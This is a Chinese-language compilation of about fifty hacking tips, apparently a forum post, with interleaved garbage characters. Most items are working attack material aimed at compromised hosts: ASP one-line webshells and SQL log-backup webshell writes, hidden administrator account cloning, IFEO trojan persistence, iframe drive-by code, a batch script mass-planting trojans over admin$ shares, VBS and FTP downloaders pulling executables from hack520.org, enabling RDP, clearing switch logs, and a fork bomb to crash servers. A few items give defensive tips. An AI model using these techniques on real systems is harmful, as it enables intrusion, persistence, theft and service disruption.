1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
7 k6 k9 }" J4 [+ B5 icacls C:\windows\system32 /G hqw20:R0 c! D* h+ x) z" y% X) f# o" j, E1 a% C# k
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
' _- f5 X# d5 j8 h4 H恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F; B% @8 d( b1 _0 f) G: x7 ?
, e) v; ]! y# q* ^+ f
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。! c4 n, W* c. C( b( z
' m* [& W: Z; ^) n2 X3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。! }% S4 s8 A. A! |& E1 y
% c' H- N2 _2 Z, c1 S1 P; l5 V3 u& Y4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号0 v. v' A. I. d0 Z1 A* L
0 T- M$ z+ }) K, ^6 Y6 U. I! M3 c2 x m5、利用INF文件来修改注册表
* A, [* O L; D[Version]
- o# N: G) _) \) uSignature="$CHICAGO$"& W, c9 p) T# R o/ ]9 j
[Defaultinstall]+ B" l1 s- Z0 G% \( _3 H, q) p1 K# D% r
addREG=Ating
# c" V/ g9 e& j& h) D2 M[Ating]
& W5 d6 E) z- u# {HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
) ?4 ^/ S5 D$ q以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
8 K6 R9 t* F" D8 Q6 F+ Krundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
: n& C, L! p9 F- ~其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
* d) o x0 b$ o5 B/ f" @HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU! E$ T7 e/ F9 ~! X8 k6 n+ E8 W
HKEY_CURRENT_CONFIG 简写为 HKCC, [! ]5 m, c8 {5 M# a
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
. M8 d4 x6 o- l- f4 ?: d"1"这里代表是写入或删除注册表键值中的具体数据, f# A' t( C' d+ V2 ^8 z+ C- t
% V H& M! R. S" L. Q/ |2 p1 ~' f
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,0 V0 q6 p8 C7 j _8 a. D# `& } N$ w
多了一步就是在防火墙里添加个端口,然后导出其键值4 r9 f5 ~- [3 f* _
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]/ }* r* X" _/ i
$ b" V7 [' l: b8 C' b1 ^2 x7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
) }& j/ N: P) N+ J在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。- l5 B0 Y- @% C/ T. }- w( w
, G$ S& a# L1 X4 @/ z: [, Q6 `8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。" `! D, z: n6 k8 g* y
# L! D) m3 D8 }3 j
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
' m* h- [" ^" i可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
! l2 E1 D* a/ z( O# a
/ g$ T6 _2 H) [ @& U. I) Y+ k" W10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
& B4 Y2 ~( m- |4 d" \. _# o7 D. o
9 O6 x% {% o+ J( F( i/ [11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,* a, z" O) F' i9 A) c2 d
用法:xsniff –pass –hide –log pass.txt
+ t2 ~9 T# ]& a8 f% n& y8 M/ v& F0 B. L$ _1 W
12、google搜索的艺术
P1 T1 X5 e& Y2 q搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”5 U* Z5 M# _0 y2 J$ |/ `( k( u" G; L
或“字符串的语法错误”可以找到很多sql注入漏洞。
- _; b9 J( j) A4 j+ q. h; J7 k6 r- u6 I: f6 F4 e* K
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
6 |+ {2 v/ p% R0 W5 t" e1 t7 H9 h; \* o& O5 D8 b1 f. a* B
14、cmd中输入 nc –vv –l –p 1987
# U& H7 p* {8 W" o做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃6 w& i2 z$ X( }! G; |3 `8 Q
6 J, O3 J9 w$ v# c* z/ {
15、制作T++木马,先写个ating.hta文件,内容为
5 `% g+ E7 {9 y5 Q$ V; |) p s<script language="VBScript">4 x' X5 f- Q7 _
set wshshell=createobject ("wscript.shell" )6 c6 l6 v' r$ ^& o: w r& m
a=wshshell.run("你马的名称",1)" C1 `) B' m" y" Q8 t. d; I+ e
window.close0 k& k- y. u4 a) U
</script>7 R$ D6 P/ i7 h+ S# n
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。" h4 e6 n" ]1 I/ M
n* b# P) H) t; M16、搜索栏里输入
# x6 l& m- M U6 {( f' ?关键字%'and 1=1 and '%'='$ l; S8 F8 d" K5 r$ ^8 ?7 F+ @# a$ O
关键字%'and 1=2 and '%'='# {% I4 F! K3 D: c
比较不同处 可以作为注入的特征字符1 {! `0 N. q& j* |( c4 `
( K7 J2 m0 K' _6 l
17、挂马代码<html>
+ P4 |; i# @; T5 Z9 ?6 ~. _<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; \, n9 V8 _" f$ W2 Z( L q P, f</html>
) m; Q# b T* k7 a0 c' k
9 C( y) D: D- o, n: X; J18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,/ j) Z- X; b/ ?; M5 @
net localgroup administrators还是可以看出Guest是管理员来。6 D3 P9 r( `6 _( c6 X7 ~. O4 |
: T+ {- Z: O' N# e, @* q( j9 @2 |19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等) u# b- j0 T \- j! J% R
用法: 安装: instsrv.exe 服务名称 路径
3 w$ G4 w# `0 G) n6 F3 g2 d( s卸载: instsrv.exe 服务名称 REMOVE" G8 u, K# L9 J0 }' `( `' j
[# {; a# j/ d) Z0 g1 o
9 `* c& y) o' J/ t; k' V21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 P5 ~& `1 u' F' c不能注入时要第一时间想到%5c暴库。
+ w h7 F' B2 _
( _# R& p; c) P/ W$ e22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~8 H3 J4 V3 g7 Z4 b' u
+ l% Y3 E( Y7 s# E! y23、缺少xp_cmdshell时4 B) q( M/ F! x, D2 ]0 M* e
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'/ I, v+ c/ a$ C- R# h0 }
假如恢复不成功,可以尝试直接加用户(针对开3389的)
4 l/ m" W3 o. h$ k2 qdeclare @o int
+ y. V% q: \! G# I- w' N- Z. Yexec sp_oacreate 'wscript.shell',@o out
. S* k0 _. i5 c. [- X! {0 o' Y0 u3 kexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
/ F0 P7 ]- G* i, u; A* N4 n4 m# z4 l8 z
24.批量种植木马.bat
2 r. o8 a( I" [! l/ Z6 }for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中$ h; f6 Q+ P: j) j# Y( Y
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
' d. N8 x6 V0 [. l3 M扫描地址.txt里每个主机名一行 用\\开头
& m: G7 ]/ W% R" `6 G+ A
$ l' n3 C) [+ \6 G% h25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
# _$ B: q( Q4 F8 e8 i
* \) |7 ?7 d$ f* N1 V8 {! w26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
! H: s6 V: \4 [1 z" \将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
# U" h z; V; q- k- w.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
n( N H0 R, R& |9 p/ [$ p- F
; o/ J( \& e2 Z8 `8 o7 R6 p27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP9 ~& @. m3 y, z+ m
然后用#clear logg和#clear line vty *删除日志
* Y) ]; C( i; G% A
( p4 B1 F4 {, B: S28、电脑坏了省去重新安装系统的方法
k* U! v8 x: `, d纯dos下执行,. Y) A$ w! m7 e, g
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config# R( U0 v! I" ~1 y! d
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config- t2 K/ W( h, x1 e
- Z; B( Q1 G: N& a! H) @29、解决TCP/IP筛选 在注册表里有三处,分别是:
) U: f) S) w( O; W$ A/ ]( g" E: e0 u' eHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip) G7 G- x, t9 o% u% n
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 j$ Y% s" L! Z3 V4 N
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip$ N3 o$ A/ j# E5 O/ l4 t. R
分别用2 s: X) w' o. u$ d/ t& K
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 f3 r' A+ B/ V- P' S! l
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
K- _) [$ Z% `+ eregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& y3 ?9 P A6 r5 }% r命令来导出注册表项
- ^6 w% {; D5 _9 k+ O# n+ g5 N然后把三个文件里的EnableSecurityFilters"=dword:00000001,
! ]4 i( |1 c9 W, Q K改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
9 X% Y( b0 _8 b5 \3 m4 Rregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。3 k* u1 k2 \4 i5 u# @9 F K* Z
5 ]# `7 S- N5 A) V# E/ [( k& W; V# X6 y
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U* h8 R- O1 w# {% a l
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3 o4 S9 @, g( W# v( K- A$ f% }0 d% y
1 V2 V' Z- k1 d& S" D) ]1 q% K
31、全手工打造开3389工具! F; T/ s2 K, u9 V% i6 h
打开记事本,编辑内容如下:7 F p" a9 { g. z
echo [Components] > c:\sql
Q! B2 f+ M6 A6 w7 Becho TSEnable = on >> c:\sql9 h9 c4 @4 L( |' F* W6 j
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
/ ~1 M& t# W, X4 R( r! l( P+ P编辑好后存为BAT文件,上传至肉鸡,执行
. R5 ~. u& o: K2 F* |/ ^ q8 S( O* y- s- M& U
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马' J x4 R4 a6 R1 z' r, k7 p
, q; g5 g6 e. e3 i3 n33、让服务器重启1 g. ?3 [6 v. q: s8 L; E; v" m
写个bat死循环:3 g) A. U1 N* O f, X) f4 M& T
@echo off
% f# @, f0 k, V/ |! ~:loop1
6 n4 y+ y2 K) Zcls
& M. p% d+ ^6 F$ w* w9 Cstart cmd.exe
# ?6 Y8 ]# Z- B5 h) w; U; Ogoto loop1
+ r2 W" O8 V! e/ {保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启9 Z8 y4 T% x! Y9 w, z u
; o: e3 \" u, f W7 j9 Q5 F8 x34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
, D- k4 h! \' V; r@echo off2 y6 z6 O+ F3 `7 ?+ j! k
date /t >c:/3389.txt
, S0 K+ n0 ]) {time /t >>c:/3389.txt: H5 p( C: u1 Y5 _
attrib +s +h c:/3389.bat% |) C! f2 h$ M3 a, x+ X9 f$ K, |
attrib +s +h c:/3389.txt4 G/ L G; x4 H8 m- ]" G0 d" ^
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt. Y: b7 n7 v: \+ l- s% v
并保存为3389.bat
# D3 C' O* b0 \1 k1 x打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号% x3 f& e/ B$ o& c
5 H0 _5 ]( W0 F35、有时候提不了权限的话,试试这个命令,在命令行里输入:* @) p k( j0 b0 {& f+ E; J
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
0 n4 p# n3 r' J8 h4 F" q. m8 f* d输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。- d) x! X% r/ C# a
1 `% l4 \3 C1 r7 q u: q! N9 V36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
5 P5 H% B* c2 m2 f k) Secho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址' S7 Q: B+ f" y0 w) m# u
echo 你的FTP账号 >>c:\1.bat //输入账号
4 q: o2 o) \" R7 \. z" {9 _echo 你的FTP密码 >>c:\1.bat //输入密码
7 r4 a# F3 `! Qecho bin >>c:\1.bat //登入, T$ \# ]' U& i4 X
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
5 ]$ s" v. ]7 z, [8 _echo bye >>c:\1.bat //退出
; |% o- U, U6 l. S然后执行ftp -s:c:\1.bat即可
' m& E( f; I) H, p) [' q4 A- l$ l( D' N9 G
37、修改注册表开3389两法
" ~/ ?1 {& O2 E0 `6 \% B+ h(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表# v8 A( B; b1 a! d# H% B* S
echo Windows Registry Editor Version 5.00 >>3389.reg
1 [$ _) d/ O9 G$ o! r. n Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
* |8 U5 S4 d$ \# h9 `. `( eecho "Enabled"="0" >>3389.reg
5 W2 ~8 k' p6 a6 G( p2 C0 Pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
. {7 D; ]! ]. c6 W$ ?& T/ e2 O0 wNT\CurrentVersion\Winlogon] >>3389.reg, [; H4 H5 X" W* y
echo "ShutdownWithoutLogon"="0" >>3389.reg
' y# I4 |! [4 B7 y2 C5 n) lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
: R# } _7 s1 l2 _$ O5 b8 c>>3389.reg
* ?; x$ G9 q0 S# p, mecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
7 h; Z/ ` v" `5 d* aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
l' ^: f5 c. \" R: k; v>>3389.reg
% w1 i' f4 [, @) Techo "TSEnabled"=dword:00000001 >>3389.reg" }8 Z4 {4 ?1 S' P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg# G* U$ Z. e! |6 W' z' f
echo "Start"=dword:00000002 >>3389.reg
3 D4 e; y7 U; ^% _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
" \( ?$ [; q+ `, [ Y>>3389.reg
- B" g. d1 }4 x# o3 |echo "Start"=dword:00000002 >>3389.reg
* U C" W- Z A$ T! Iecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
9 k: J1 ]6 S! o8 recho "Hotkey"="1" >>3389.reg( o5 G( u4 k+ Z3 T' i6 I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, l( R3 D+ |0 q0 W2 ]- _! f/ E1 ~Server\Wds\rdpwd\Tds\tcp] >>3389.reg2 u% g; w) B- ]8 `
echo "PortNumber"=dword:00000D3D >>3389.reg
1 o: v; Y/ v) ?9 _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 ~$ O- s0 l) \
Server\WinStations\RDP-Tcp] >>3389.reg0 R3 f) `. E4 ~% n9 r
echo "PortNumber"=dword:00000D3D >>3389.reg3 x$ Q8 Q0 X/ `6 b
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。; V' D% \; j% y8 G: @
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
8 O6 g5 M3 D- F6 n因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
. Y. q2 J/ n: Z& I* L(2)winxp和win2003终端开启2 [; a9 `# X) y6 c1 k
用以下ECHO代码写一个REG文件:
1 ~1 k/ M4 f. ^& b5 T) I1 Techo Windows Registry Editor Version 5.00>>3389.reg; g! m$ v9 f- j9 r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 W$ y( f/ G6 {% F" Z& }0 K; d; {Server]>>3389.reg! v9 v( f4 d2 |& {6 K1 |
echo "fDenyTSConnections"=dword:00000000>>3389.reg" f4 e7 G2 l& Q) h7 L9 o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 |& ^, P3 X6 NServer\Wds\rdpwd\Tds\tcp]>>3389.reg
2 m! W o- w3 mecho "PortNumber"=dword:00000d3d>>3389.reg
6 ]( l- P: I# Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' p8 c2 o$ V8 s6 H
Server\WinStations\RDP-Tcp]>>3389.reg
- C: C( F1 U! ]3 S; |$ xecho "PortNumber"=dword:00000d3d>>3389.reg
P# v5 q3 {" T8 q# T# Z- A然后regedit /s 3389.reg del 3389.reg
' r1 ^' L' t, \+ y; H9 [5 vXP下不论开终端还是改终端端口都不需重启; Y& j' T5 h1 l# Y1 W8 C7 i9 C, k
4 Z* |8 w j5 g+ a X3 F
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
A: e0 |0 T. E用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa', y3 z6 _0 ?# ~
% O t* @$ t3 v9 @( ]; Y
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!$ r' _% M" M& j! N
(1)数据库文件名应复杂并要有特殊字符" M# o' ]. B, X+ L. c6 P* A
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源; K" ?( {" v7 z! L, ^" w
将conn.asp文档中的
, T" n4 o9 }6 ~1 s. C& y" YDBPath = Server.MapPath("数据库.mdb")
3 d) Z7 P9 ?, F" w" |/ x) B I2 zconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
9 M' E: ~& R4 e) \- @# t
e& T# L1 f$ j修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置8 H, R: {# _- w$ @5 J$ L4 |: i* K
(3)不放在WEB目录里
1 |( T% N V9 g' F: z5 f9 G
, W* x! u! |6 _% j* A40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉 o/ H/ k w; o5 s7 c
可以写两个bat文件
5 ~; b& J/ Y* m1 r) d9 N@echo off
, n( I! r- n9 S@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
2 B% R" | h" A. @@del c:\winnt\system32\query.exe' y: s1 c* d" Y7 W0 u# E
@del %SYSTEMROOT%\system32\dllcache\query.exe! X4 S8 o* E) I4 \2 z- o
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的+ I1 u0 O5 ?- f8 U' c Y( d8 |
( [9 d4 _: `( `$ U8 a i
@echo off
% i7 v2 _$ t: k" @( P@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
" ]- w7 m* X. S/ c6 k@del c:\winnt\system32\tsadmin.exe* Y0 }0 M* ?. J1 B, V$ e
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
* d' w: A3 `8 I' n( J9 C7 z3 q( r1 f$ i8 I, T" |
41、映射对方盘符6 X5 g( c0 D, ~2 J& j# z7 J
telnet到他的机器上,
9 N7 h, }' ?8 K4 k; p/ R3 Dnet share 查看有没有默认共享 如果没有,那么就接着运行) q! S, G! N( {) @
net share c$=c:
* R5 l# u3 A5 q4 z* H8 ~8 vnet share现在有c$& T! m7 J# t0 B! S' ^/ u" ~
在自己的机器上运行3 D, J/ ~2 E! f" R/ ?. {
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K r) D) x# `2 L% r8 c* Q
1 @; a" X! w5 r6 L42、一些很有用的老知识
4 s x, o |: |% [. d$ c3 p2 ]" P xtype c:\boot.ini ( 查看系统版本 )5 F8 x b; ~/ x9 z2 T( p, J& p" v
net start (查看已经启动的服务)
5 b4 ~- u! _* b0 `" \query user ( 查看当前终端连接 ). H U# o& n+ Y2 `' _2 t
net user ( 查看当前用户 ). |2 J; t S( {7 A- Q
net user 用户 密码/add ( 建立账号 )
" j" S' A" k' M" } V; v! Unet localgroup administrators 用户 /add (提升某用户为管理员)
x6 L: N4 @' Z9 }* h9 nipconfig -all ( 查看IP什么的 )
- E5 D. Z. ?& Q8 W/ v h% Snetstat -an ( 查看当前网络状态 )2 ]* }% ?+ q/ b- i2 c8 X
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)$ J9 B/ s; d0 y0 s6 [
克隆时Administrator对应1F4
- |2 S* H4 I9 H) ^guest对应1F51 L% ]8 O: U5 K" x
tsinternetuser对应3E8
5 {2 G/ l' O: q) C6 q; s& ~; j/ @& m4 O4 H! W) w+ G6 Z
43、如果对方没开3389,但是装了Remote Administrator Service' z6 u. R( R( _
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接; P0 ]) E& J* U9 v8 i o# k
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
6 Z# r# \) i: F+ v- [- ~6 y3 p* W( y先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"4 _1 C1 T: r- W1 u ], y
! [4 A* X7 B0 K7 ?
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)# {* d+ u% h9 h% W
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)- q/ r. \3 a; h9 d; Z
' t/ z3 v5 i2 ~" y* y) l# b45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)6 S, e/ s! X; o2 I- y
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
. s! f( Q- R8 V+ t% ?^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =) [4 l7 }7 y6 v5 p. I
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
; U+ G( x/ {# x8 p- f: J1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
7 b# Y. f& M5 p! i(这是完整的一句话,其中没有换行符)' ~" V0 _5 c5 r; }) r& O6 h8 q
然后下载:
. C, v; J9 p- e7 ecscript down.vbs http://www.hack520.org/hack.exe hack.exe6 a+ ~ Z! z4 v2 L7 g% M
( I. L: |; J7 n/ O$ b! U. o
46、一句话木马成功依赖于两个条件:
$ ~5 _6 v+ c2 o8 d/ G* Q2 M& s1、服务端没有禁止adodb.Stream或FSO组件; `8 X# K. O% M; V0 `. f
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。+ p6 f( H2 T9 o" T: g, c
2 f0 }4 U1 c- L% p; [; }% r47、利用DB_OWNER权限进行手工备份一句话木马的代码:
% ?+ x( e, Y0 [, F& X% D D;alter database utsz set RECOVERY FULL-- Q2 d! n: n, }6 o& O& H: Z
;create table cmd (a image)--
5 H1 o9 P* C) l$ p# `;backup log utsz to disk = 'D:\cmd' with init--% N4 f7 p4 Z6 H. g. r. e
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--# h$ G# e/ l. \& O! P5 v
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
3 Q& j/ l% b5 A, s1 J' Q注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。. E/ T+ K2 K7 N0 }4 e5 Q' b5 J# I: C
& _7 s& v* r0 [8 a, F4 t; [) d48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" Q6 Z3 B8 `5 g& V& R* B1 {3 F! V) w* T, H7 _) w1 C
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
9 M2 Q7 Q, P# {/ K$ Y所有会话用 'all'。2 k/ h; x' j. {7 _ ?
-s sessionid 列出会话的信息。& ], E$ }* A9 h
-k sessionid 终止会话。
( l- s! z; w- w: p5 L& M4 N-m sessionid 发送消息到会话。
; n$ r3 j/ `% Z$ ]! n, E! n: K: Q& r
config 配置 telnet 服务器参数。
4 m7 J4 T: ^& n' k1 [5 `! O2 B- l2 \( r
common_options 为:
! H# C& S5 J$ c-u user 指定要使用其凭据的用户% a5 r9 a8 u/ O/ l6 o
-p password 用户密码$ j: @ [6 Y! E% [8 N) r) @0 I" W
7 g# |1 I. a- P1 p. ?* u. a( V
config_options 为:
" {) Y) q0 b2 k9 }) m2 W! p6 Rdom = domain 设定用户的默认域7 K+ ~4 o' l4 H8 B/ t3 y
ctrlakeymap = yes|no 设定 ALT 键的映射, e. r3 D( d8 s8 D. h
timeout = hh:mm:ss 设定空闲会话超时值0 ^; Z$ X3 f p$ A# L) d7 r
timeoutactive = yes|no 启用空闲会话。
. ]$ O, }0 A" T& j# x3 Umaxfail = attempts 设定断开前失败的登录企图数。
7 H& C$ O# j) R" ~+ |maxconn = connections 设定最大连接数。% r; i) [, \, ~
port = number 设定 telnet 端口。
; B+ w7 A/ E9 d( isec = [+/-]NTLM [+/-]passwd% T7 Z9 i3 \1 \( j" M2 v5 m4 n
设定身份验证机构
2 v! K( O6 Z( S' J% yfname = file 指定审计文件名。* [3 ^- X6 k" I
fsize = size 指定审计文件的最大尺寸(MB)。
, T- U9 ^# U7 Lmode = console|stream 指定操作模式。" |/ c5 l. Q- x2 \% {# y5 ]8 _
auditlocation = eventlog|file|both
+ s/ ^5 C- W4 r$ y; z1 O# p指定记录地点
' @/ N9 Z& z% C+ o+ t0 Kaudit = [+/-]user [+/-]fail [+/-]admin) I9 K2 O, B: C. z5 |! y6 K* o
1 P2 }& y, k3 t; b
49、例如:在IE上访问:
5 \# Y7 {6 Y2 Q7 Mwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/6 ~- z9 ~0 c! X0 J; L
hack.txt里面的代码是:
- V d. j3 A& G<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
9 U1 `" G7 q9 W& ~) l2 F& \把这个hack.txt发到你空间就可以了!
4 Y" Y: F* q1 T/ y% k! ]# a2 F9 W这个可以利用来做网马哦!
2 y7 t8 Q! a: q2 m& A
* F, Z& Q- o5 A2 O, |" H% K50、autorun的病毒可以通过手动限制!
; z, }! f$ l$ ^0 ?/ R" R' o1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!6 l. l" w3 r" V7 |
2,打开盘符用右键打开!切忌双击盘符~
. X& s2 a. g* A0 j- g3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!* F! }# G9 m! r& C8 y; p! g$ l
4 w5 ~ K# j3 q* X; z51、log备份时的一句话木马:
2 M4 f2 m D* M- qa).<%%25Execute(request("go"))%%25>6 B: o& I( x; [ w+ ]0 t! L& \& `
b).<%Execute(request("go"))%>6 ~6 j I9 N; R5 I
c).%><%execute request("go")%><%
4 V2 r: z k$ l' ld).<script language=VBScript runat=server>execute request("sb")</Script>
$ ]. Y: v, N0 O6 K6 @e).<%25Execute(request("l"))%25>
$ m/ x: d( H, T4 J" if).<%if request("cmd")<>"" then execute request("pass")%>
: i# o1 M: y" V3 t& o8 l
2 R/ c7 P* Y" |$ V52、at "12:17" /interactive cmd( z% v6 w6 O% P* Q
执行后可以用AT命令查看新加的任务
& _" E3 _ u" `; I" P) D用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
